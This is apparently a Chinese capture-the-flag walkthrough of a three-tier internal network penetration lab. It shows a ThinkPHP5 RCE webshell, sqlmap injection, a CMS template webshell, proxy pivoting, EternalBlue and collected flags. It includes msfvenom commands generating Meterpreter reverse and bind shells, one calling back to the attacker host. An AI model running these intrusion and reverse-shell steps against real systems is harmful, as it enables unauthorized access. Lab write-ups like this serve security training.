CFS三层内网渗透
2024-09-24 00:00:00
# 内网
CFS三层内网渗透笔记
网络配置
攻击机:192.168.1.129/192.168.2.163
CentOS:192.168.1.128/192.168.2.165/192.168.22.128
Ubuntu:192.168.22.129/192.168.33.128
Windows:192.168.33.33
外网打点
信息收集
1 | Nmap scan report for 192.168.1.128 |
先访问80端口

一个TP5的框架,上工具扫一下

可以看到有5023的RCE,上个webshell

网站目录下flag:flag{e2D3aFdasde},robots.txt里面flag:flag{QeaRqaw12fs}

根目录下flag:flag{qEa12Nasd1a}
现在的权限是www,提权先跳过,后面再补
TODO:提权
centos上线msf
生成木马
1 | msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.2.163 LPORT=4444 -f elf > centos.elf |
上线

网段查看并建立路由

设置代理

对22网段信息收集
上传fscan进行内网扫描

可以看到在129主机上开放一个CMS

有一个sql注入的提示

sqlmap一把梭,拿到管理员账号密码

从网站robots文件得到后台地址

admin/123qwe登录后首页flag:flag{eS3sd1IKarw}

修改网站模板,添加一句话木马

Proxifier+哥斯拉上线

flag42Fs.txt文件得到flag:flag{23ASfqwr4t2e}
根目录下flag:flag{1a2saA23eas}
提权暂时跳过
ubuntu上线msf
用msf生成正向木马上线
1 | msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=2222 -f elf > ubuntu.elf |

查看建立路由

对33网段信息收集
1 | proxychains nmap -Pn -sT -T4 192.168.33.33 |

用445端口的永恒之蓝打
当时只想着换正向payload了,忘了换操作系统了……

ok